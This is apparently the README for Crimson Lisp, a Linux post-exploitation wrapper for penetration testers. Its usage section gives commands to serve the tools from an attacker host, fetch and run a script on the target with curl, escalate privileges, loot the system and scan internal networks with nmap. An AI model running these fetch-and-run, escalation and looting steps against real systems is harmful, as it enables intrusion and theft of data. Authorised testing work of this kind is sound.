crimson_lisp
crimson_lisp copied to clipboard
Karmaz95
Linux Post-Exploitation tools wrapper
Crimson Lisp
Crimson Lisp is a tool that automates post-exploitation
PRIVILEGE ESCALATION&LOOTINGphases. It uses many open source tools. Most of them are available for download from GitHub.
Installation
git clone https://github.com/Karmaz95/crimson_lisp.git
FIRST UPDATE THE TOOL
chmod +x update.sh
./update.sh
If hosted from Windows, convert the line endings of the script file from Windows-style (CRLF) to Unix-style (LF):
dos2unix tools/les.sh tools/linpeas.sh lisp.sh update.sh
Using VScode:
1. Open the script file in Visual Studio Code.
2. Look at the bottom right corner of the editor. You should see a label that displays the current line endings used in the file. It should either say "CRLF" or "LF".
3. Click on the label and select "LF". This will change the line endings of the file to Unix-style.
4. Save the file by going to File > Save.
Usage
ON THE HOST MACHINE
cd crimson_lisp
sudo python3 -m http.server 80
ON THE TARGET MACHINE
1. DOWNLOAD THE TOOLS
curl -s -k http://127.0.0.1/lisp.sh -o lisp.sh; chmod +x lisp.sh
./lisp.sh -u "http://127.0.0.1/"
2. ESCALATE THE PRIVILEGES
./lisp.sh -e
3. LOOT THE SYSTEM
sudo ./lisp.sh -l
4. NETWORK DISCOVERY (as root)
4.1. PING SWEEP
./nping INTERNAL_IP/24
4.2. NMAP SCAN
./run-nmap.sh -Pn INTERNAL_IP -p- --append-output -oA all_ports_scan
4.3 TOP PORTS SCAN
./run-nmap.sh -Pn 172.22.11.1/24 --top-ports 1000 --append-output -oA AD_ports
HISTORY
If you are curious about how it works, read my blog:
List of utilized tools
The following tools are used in
Crimson Lisp. I encourage you to study the links below. They will help you in your work.
LICENSE
This program is free software: you can redistribute it and/or modify it under the terms of the Apache License. Crimson Lisp and any contributions are Copyright © by Karol Mazurek 2022.
SUPPORT
You can support the project by buying me a coffee or via NFT which unlock the secret Crimson Web community.
Karmaz95